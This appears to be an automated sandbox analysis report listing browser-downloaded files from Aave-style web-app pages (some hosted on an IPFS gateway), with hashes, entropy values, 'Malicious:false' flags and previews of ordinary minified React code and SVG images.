                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6211],{99730:function(e,r,t){t.d(r,{f:function(){return c}});var n=t(49501),a=t(30120),o=t(29630),i=t(69331),s=t(67916),u=t(85893),c=function(e){var r=e.txError;return(0,u.jsxs)(a.Z,{children:[(0,u.jsx)(s.Q,{txError:r}),"MetaMask Message Signature: User denied message signature."!==r.rawError.message&&"MetaMask Tx Signature: User denied transaction signature."!==r.rawError.message&&(0,u.jsx)(a.Z,{sx:{pt:4},children:(0,u.jsx)(i.v,{severity:"info",children:(0,u.jsxs)(o.Z,{variant:"description",children:[" ",(0,u.jsx)(n.cC,{id:"Tip: Try increasing slippage or reduce input amount"})]})})})]})}},21732:function(e,r,t){t.d(r,{P:function(){return T}});var n=t(90116),a=t(59499),o=t(50029),i=t(87794),s=t.n(i),u=t(75331),c=t(85945),l=t(67294),d=t(74119),f=t(8195),h=t(77537),p=t(78371),v=t(32113),m=t(39771),y=t(31001),x=t(89291);function g(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13984), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):13984
                                                                                                                                                                                                                                                  Entropy (8bit):5.462369483972633
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:7FIHq7gabbnWPjjdBegOiiSg51bCsTUjFIHJ9Kxpj:7D7Db6PjjygOzX51VAaY
                                                                                                                                                                                                                                                  MD5:13F538B82E157080EB149BB81C238B7E
                                                                                                                                                                                                                                                  SHA1:643A1E66252F352431D18E805F4EC1622C357DFD
                                                                                                                                                                                                                                                  SHA-256:6710FB443F5333A5CEA97E5C3CDBDB843E3E2D7FFD15FA1CC8A9217E05EDB19F
                                                                                                                                                                                                                                                  SHA-512:96FE6A948A463C208BA9D77C2CFAF301CA610C5186A453F1908840764545910939DF7EDCF7EC90DD3FF53E3E3F116F253BAE32443115C053DB79341055E5FD56
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/4284-b57bc1e747434eb3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4284],{50020:function(e,n,r){var t=r(59499),o=r(4730),i=r(91655),s=r(30120),a=r(29630),c=(r(67294),r(46839)),l=r(41024),d=r(85893),p=["minVal","maxVal","percentVariant","hyphenVariant"];function u(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function x(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?u(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):u(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}n.Z=function(e){var n=e.minVal,r=e.maxVal,t=e.percentVariant,u=e.hyphenVariant,h=(0,o.Z)(e,p),f=(0,c.HT)(),m=f.ghoLoadingData,j=f.ghoReserveData;if(m)return(0,d.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (30804), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):30804
                                                                                                                                                                                                                                                  Entropy (8bit):5.5601823009693
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:ayP66F6xI8VecZU+tJI7OzgetRQiGRGnhFvFUfb2VzclJGbk:SD3eD+DIazvEh
                                                                                                                                                                                                                                                  MD5:073C1C301C982B9533D7EB9940F54565
                                                                                                                                                                                                                                                  SHA1:0D7016C67E5AB8B590C4ACF11169FE8D85583BC5
                                                                                                                                                                                                                                                  SHA-256:EB68866B6A0AEE35B9EAC63DA3D51379D26262CFD5C8ED12207929E652F81911
                                                                                                                                                                                                                                                  SHA-512:8EEA025BD30127DD676BFB9B75910774AE479B98A5B7EB51016B823A73B549FF93383D0AED735B7D9B34BB19F7D4775E0CE1B76B91F405B477C9BDEC5AD00C72
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9287,6504],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","cl
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29683), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):29683
                                                                                                                                                                                                                                                  Entropy (8bit):5.455287994633197
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:uU/sS8arv8XxI2i5rkNTX5jNHi3o4E4pS+tZbytCXriiGRKq22vFPV:f/sS8acuoJT8o4EcS+tZbytCXfB2v3
                                                                                                                                                                                                                                                  MD5:41266FF7ADC44DD0F279A3A0CEBFB7CA
                                                                                                                                                                                                                                                  SHA1:2A35DEEE10E6E637CC40B818D78532BCBDAAB95B
                                                                                                                                                                                                                                                  SHA-256:1E49F4674D467814D5726D279DE8ED1261A98A34E7F7C58D8E1DB3E2178A8DAF
                                                                                                                                                                                                                                                  SHA-512:53AE26A9DAEA86CD1F3E451AD9A231D00FFDADBA5E0A9AF3459D05F0A528308B064DB8803BAD7D3F864BEF282D6EBFAA3C0CAAEB567177DDC01A31F455732058
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1811],{34637:function(e,t,r){r.d(t,{Y:function(){return d},Z:function(){return p}});var n=r(59499),a=r(81719),o=r(87054),s=(r(67294),r(85893));function i(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?i(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):i(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var l=(0,a.ZP)(o.Z)((function(e){var t=e.theme;return{border:"0px",flex:1,backgroundColor:"#383D51",borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{backgroundColor:"#FFFFFF",borderRadius:"4px !im
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5833), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5833
                                                                                                                                                                                                                                                  Entropy (8bit):5.413755638742764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:2LKFASmej5Mb8yET+ppvEVz9ufifqcvpnJ6I8G29XyYU5TzYimtYimuOcT:2+xvj5Mb89+DvEVpQyJWpCYUZzYxYq
                                                                                                                                                                                                                                                  MD5:1F65E9C87A2972BA79736481845E781F
                                                                                                                                                                                                                                                  SHA1:D7A695F8F2D062E8A16D578DAE357FE62A2658F6
                                                                                                                                                                                                                                                  SHA-256:1751B3188F9C8A4A21938D83EA30DAA9244319E5BC24C1132E704F2226D74C2B
                                                                                                                                                                                                                                                  SHA-512:80E21965E501B4844A400B6C648203F410716B0E7446242940F3D5BE7B337ED634DF7342598359B868AB900EB95FBC50CBCD02F10A0AFF9C57F63F766049BE9A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4245],{9144:function(t,e,n){"use strict";var r=n(63366),o=n(87462),i=n(67294),c=n(95408),u=n(98700),a=n(39707),s=n(59766),f=n(81719),l=n(78884),v=n(85893);const p=["component","direction","spacing","divider","children"];function d(t,e){const n=i.Children.toArray(t).filter(Boolean);return n.reduce(((t,r,o)=>(t.push(r),o<n.length-1&&t.push(i.cloneElement(e,{key:`separator-${o}`})),t)),[])}const m=(0,f.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(t,e)=>[e.root]})((({ownerState:t,theme:e})=>{let n=(0,o.Z)({display:"flex",flexDirection:"column"},(0,c.k9)({theme:e},(0,c.P$)({values:t.direction,breakpoints:e.breakpoints.values}),(t=>({flexDirection:t}))));if(t.spacing){const r=(0,u.hB)(e),o=Object.keys(e.breakpoints.values).reduce(((e,n)=>(("object"===typeof t.spacing&&null!=t.spacing[n]||"object"===typeof t.direction&&null!=t.direction[n])&&(e[n]=!0),e)),{}),i=(0,c.P$)({values:t.direction,base:o}),a=(0,c.P$)({values:t.spac
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):117965
                                                                                                                                                                                                                                                  Entropy (8bit):5.4719388116538275
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:S2EaPtYP7u2RNmaeg3qqM3Qf1mlbxBCJYjNwGWYzFzeoUvT8KuVecXWJl28PaPRb:HvP6Tu4mSJAxMgrZfLezDa
                                                                                                                                                                                                                                                  MD5:F82FE3BB636FEF6A856E1768C47BA4E5
                                                                                                                                                                                                                                                  SHA1:FDF1E276E3D45B896DD7E29E181A87C300EFF1D9
                                                                                                                                                                                                                                                  SHA-256:E4F204B4CC4D83A0D642C453A1A62CF26343B21B8DDB35D251FA47FA32AC3B15
                                                                                                                                                                                                                                                  SHA-512:82B70776F284EE726EBC9C6FC7B8A0B81A718644CBE989E4D1F9EA9AF70150C87FA8CC355CA6CB683C73230E1C93D8B8A4B6FB9E775437004DBE9D309F47464C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/index-5c55ce06141b7657.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{56687:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return wn}});var n=r(49501),o=r(30120),a=r(29630),i=r(67294),s=r(34637),l=r(59379),c=r(46930),d=r(78371),u=r(45745),p=r(15446),x=r(70675),b=r(77537),h=r(75331),m=r(62097),v=r(61225),y=r(75084),j=r(11163),f=r(68861),g=r(57609),w=r(59499),C=r(80854),O=r(1279),k=r(82403),P=r(14379),Z=r(45884),A=r(99435),D=r(1475),S=r(69331),B=r(14795),T=r(43629),E=r(41551),I=r(69125),M=r(81902),R=r(25049),N=r(45556),U=r(73965),L=130,Y=160,_=130,F=function(e,t,r,n,o){return e?V(t,r,n,o||!1):W(t,r,n,o||!1)},V=function(e,t,r,n){return"symbol"===e?z(!0,t,r):"usageAsCollateralEnabledOnUser"===e||"debt"===e?r.sort((function(t,r){return Number(t[e])-Number(r[e])})):(n&&r.sort((function(e,t){return"Variable"===e.borrowRateMode?Number(t.reserve.variableBorrowAPY)-Number(e.reserve.variableBorrowAPY):Number(t.reserve.stableBorrowAPY)-Number(e.reserve.stableBorrowAPY)})),r.sort((function
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):87973
                                                                                                                                                                                                                                                  Entropy (8bit):5.125806607183933
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:f0kGwo/3g1MGEN6UCSQyYHhU58xxfrDX/5CF+gD58G3LpV9H5B7va:f0kGDZc
                                                                                                                                                                                                                                                  MD5:E05640582E20F17E0F1797160B67DCD4
                                                                                                                                                                                                                                                  SHA1:DCB27383F5836437E5433C7CCB5981E94826EE00
                                                                                                                                                                                                                                                  SHA-256:E9DEEBCC271633C282AB3FE440CE81A196ECE4F402804FE8940030F98C563475
                                                                                                                                                                                                                                                  SHA-512:60CDDA59E85FDED81B351614DAF3D40B30F939F7F8D9B586F516165699822E8F07F344CDD3709DCF6ADA350C725330DF26B6947322F154AB54D02C5AF3AAD71B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="1440" height="900" viewBox="0 0 1440 900" preserveAspectRatio="xMinYMin slice" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)"><path d="M1440 0H0v900h1440V0Z" fill="url(#c)"/><path d="M1440 0H435.551v620.81H1440V0Z" fill="url(#d)"/><path d="M1440 341.601H484.351v558.38H1440v-558.38Z" fill="url(#e)"/><path d="M1440 0H427.5v690.995H1440V0Z" fill="url(#f)"/><path d="M787.663 810.02c330.987-141.179 530.547-416.834 445.727-615.692C1148.57-4.53 811.492-51.288 480.502 89.891 149.512 231.07-50.048 506.725 34.772 705.583c84.821 198.858 421.901 245.616 752.891 104.437Z" fill="url(#g)"/><path d="M1024.18 825.565c290.6-123.952 456.96-386.723 371.57-586.916-85.39-200.193-390.19-261.999-680.792-138.047-290.602 123.952-456.959 386.724-371.569 586.917 85.389 200.193 390.19 261.998 680.791 138.046Z" fill="url(#h)"/><path d="M673.907 771.815c264.238-112.707 429.363-319.136 368.823-461.073-60.538-141.936-323.823-165.631-588.061-52.924C190.431 370.5
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):92
                                                                                                                                                                                                                                                  Entropy (8bit):4.440074751043314
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
                                                                                                                                                                                                                                                  MD5:7C3F7E060745668041278118C0BB3D6D
                                                                                                                                                                                                                                                  SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
                                                                                                                                                                                                                                                  SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
                                                                                                                                                                                                                                                  SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/qfKi0l7EhUa_QqPERmaKb/_middlewareManifest.js
                                                                                                                                                                                                                                                  Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3146
                                                                                                                                                                                                                                                  Entropy (8bit):4.484082045212369
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:C4LO/K7oWBkomgBkRzd0kJBJkI8JkINGD/dYk2kahkzd/FnLgkpmZ5ZOE83VCn:RO/IS53JBJbKbN4WQbMRZmEAI
                                                                                                                                                                                                                                                  MD5:81084FF5A27B6E6FF487E479C37D1660
                                                                                                                                                                                                                                                  SHA1:81A274F69A1358F85715A0FEA227730D795CB353
                                                                                                                                                                                                                                                  SHA-256:075DE1D6EA4FB470197A88BA371F60F70B819B250CB5AF8BD6A4794B1A9CA4A1
                                                                                                                                                                                                                                                  SHA-512:CCCD00A5C013B130BE0A8466F903F7EEE9306518DFAA8758849027EBC1829EA2A6B7516E4D2070B110A12EC7EB559E3B75D256AD1B07BE3FD8595C0E430DC0D5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19">. <defs>. <style>. .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225}. </style>. </defs>. <g id=".._2" data-name=".. 2">. <g id="Layer_1" data-name="Layer 1">. <path class="cls-1" d="M89.59 19.89 84.93 8.38a5.51 5.51 0 0 0-7.19-3l-5.67 2.25A12.42 12.42 0 0 0 56 .91L45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0 0 3.04-7.19ZM11.65 52.94a2.76 2.76 0 0 1-3.59-1.52l-3.63-9A2.76 2.76 0 0 1 6 38.87l4-1.65 5.69 14.07ZM22.33 39.6a3.72 3.72 0 1 1 2.06-4.85 3.71 3.71 0 0 1-2.06 4.85Zm33.36-1.55-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11171), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11171
                                                                                                                                                                                                                                                  Entropy (8bit):5.421243293972017
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:ZqCc0sGOA7RCzeQ5t2W++bzJuCC66bc66WzTXAQErzkK6polUy6ANADSY6Uolq+Z:LaGSXNFjubAWH1ao/yrSua+aaTEKPGu
                                                                                                                                                                                                                                                  MD5:3DBBBE5E97A8B0B863FA9CDCAEAF7255
                                                                                                                                                                                                                                                  SHA1:B408B258D2A7364724F7566A23F6D6CBBD44828A
                                                                                                                                                                                                                                                  SHA-256:0F6ACC0732DBCFD65ADA5593CADA32BE800B526FBD9A63C25159F1AAFCF15EB8
                                                                                                                                                                                                                                                  SHA-512:7B3A198B7181B9771CC68CD4D65DE701CA7F0519E2A0F1596660F68E7B0DC49CD8A194CE89D63D48917517582C0D91FB32883487CE6B214E5DDD60385E829F50
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4815],{25563:function(e,t,r){r.d(t,{hu:function(){return Z},gO:function(){return C},tF:function(){return M}});var n=r(59499),o=r(49501),i=r(61782),a=r(30120),s=r(72389),c=r(62097),l=r(61225),u=r(82334),d=r(81645),p=r(29630),x=r(31538),h=r(61702),b=r(67294),f=r(78371),g=r(57609),m=r(46930),j=r(63206),v=r(34637),k=r(59379),y=r(85893);function O(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function w(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?O(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):O(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var F,Z=functio
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25095), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25095
                                                                                                                                                                                                                                                  Entropy (8bit):5.455472623227908
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:Nn2zK1z18y22flfn1CrWNhoBuAZS+uUEjbEbE9Ez31DbgDB8yMpgmEke9OnQ:NWK1LJtz8QmzRs2R7Eke9OnQ
                                                                                                                                                                                                                                                  MD5:054AAB65218FB623B5EEF9FA56EFF409
                                                                                                                                                                                                                                                  SHA1:BA188939A989CBBFFE20A54C441DE5F0C9C7B79D
                                                                                                                                                                                                                                                  SHA-256:0D702A154F8E26F4099FE6B80690129F058537A7B821D171152B301307791C11
                                                                                                                                                                                                                                                  SHA-512:9DD0C937D1CFEAD97A90708FA8F07F3B56B063F05A008A8C287752E31C787ED377C41AE84B49ADDA8786E1B4A60FD32778CB886338B418C7BCA7E40F5DC9401B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1162],{4840:function(e,t,r){"use strict";r.r(t),r.d(t,{MarketContainer:function(){return ge},default:function(){return ve},marketContainerProps:function(){return be}});var n=r(59499),i=r(64288),s=r(30120),o=r(67294),a=r(59631),l=r(49501),c=r(80854),x=r(62097),d=r(61225),u=r(29630),p=r(54181),h=r(45556),m=r(13850),j=r(68861),y=r(69331),f=r(28480),b=r(14795),g=r(46839),v=r(46930),w=r(14379),Z=r(45884),O=r(99435),D=r(1475),P=r(36864),C=r(75084),S=r(11163),A=r(14249),k=r(42115),I=r(71692),E=r(44749),L=r(14463),T=r(19547),V=r(85642),N=r(78371),U=r(57609),M=r(87385),W=r(52906),F=r(35161),_=r(32383),B=r(41024),Y=r(72667),z=r(85893),R=function(e){var t,r=(0,P.Z)({},e),n=(0,S.useRouter)(),i=(0,v.f)().currentMarket,o=(0,N.Y)((function(e){return e.trackEvent})),a=null===(t=V.U[i])||void 0===t?void 0:t[r.symbol],c=(0,M.Pu)(r.symbol,i,M.MF.SUPPLY),x=(0,M.Pu)(r.symbol,i,M.MF.BORROW);return(0,z.jsxs)(_.H,{px:6,minHeight:76,onClick:function(){o(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17412)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17461
                                                                                                                                                                                                                                                  Entropy (8bit):5.594663499090488
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ewLnWOUnUuyMNps0HHHsglNzUxBAAdTRIZWiv/XB2iQBYM:9LQne0P5UxMXB2izM
                                                                                                                                                                                                                                                  MD5:B9F703BE7873D3345873D81FA4454C0D
                                                                                                                                                                                                                                                  SHA1:39415C88914012552733A2B30E66C2E62453746B
                                                                                                                                                                                                                                                  SHA-256:33AB23E5DF97662D946B76428A2DC962998B670FC24127B2817799D14A9A2F3A
                                                                                                                                                                                                                                                  SHA-512:3E15A8117CCB11BFC4866C539CA6511FD2B39CC771072971F1FD1ECB889BBA55F6C9FD0788287ACAE445802C44C2F13BBBD9FB3E32189E14D0BBD3B6C8D38670
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/f93d6452fe5ed4c7077a.js
                                                                                                                                                                                                                                                  Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78776"],{884835:function(t,e,r){"use strict";var o=r(311596);function n(){}function i(){}i.resetWarningCache=n,t.exports=function(){function t(t,e,r,n,i,a){if(a!==o){var u=Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw u.name="Invariant Violation",u}}function e(){return t}t.isRequired=t;var r={array:t,bigint:t,bool:t,func:t,number:t,object:t,string:t,symbol:t,any:t,arrayOf:e,element:t,elementType:t,instanceOf:e,node:t,objectOf:e,oneOf:e,oneOfType:e,shape:e,exact:e,checkPropTypes:i,resetWarningCache:n};return r.PropTypes=r,r}},639519:function(t,e,r){t.exports=r(884835)()},311596:function(t){"use strict";t.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},58615:function(t,e,r){var o=r(338091);function n(t){this.mode=o.MODE_8BIT_BYTE,this.data=t}n.prototype={getLength:fu
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12167), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12167
                                                                                                                                                                                                                                                  Entropy (8bit):5.537485892227994
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:DHVadvGaBAq0eiVfkG3G88YRI7bKNJjZ2WWYWYo0NP1CicLScEW9/Qm5Sv1:DIduaBAq0eMXoYRI7OzF2lYHN1CicL1a
                                                                                                                                                                                                                                                  MD5:3D132E0026FBA886C13916FDB5E33D01
                                                                                                                                                                                                                                                  SHA1:E4D4D6A926D0D2588AAF7A497369A09C17397730
                                                                                                                                                                                                                                                  SHA-256:EA5A9774A01EFE33251E0AAF997F8DD4732BFBC6BE28E4C0E1C92A0626370924
                                                                                                                                                                                                                                                  SHA-512:2D4917FC0D6848FA631E4779CCD7E0BB2097CECEF4407970C442E58C537C2D41A1E30C070F92A9BA9749895EEC3D45472D79E96B83EF2CCFB9C47A72D19FE1E8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7978],{41024:function(e,t,r){r.d(t,{J:function(){return p},B:function(){return b}});var n=r(59499),o=r(4730),i=r(1279),a=r(29630),c=r(85893),s=["value","symbol","visibleDecimals","compact","percent","symbolsVariant","symbolsColor","roundDown","compactThreshold"];function l(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?l(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):l(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var d=["","K","M","B","T","P","E","Z","Y"],p=function(e){var t=e.value,r=e.visibleDeci
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):400
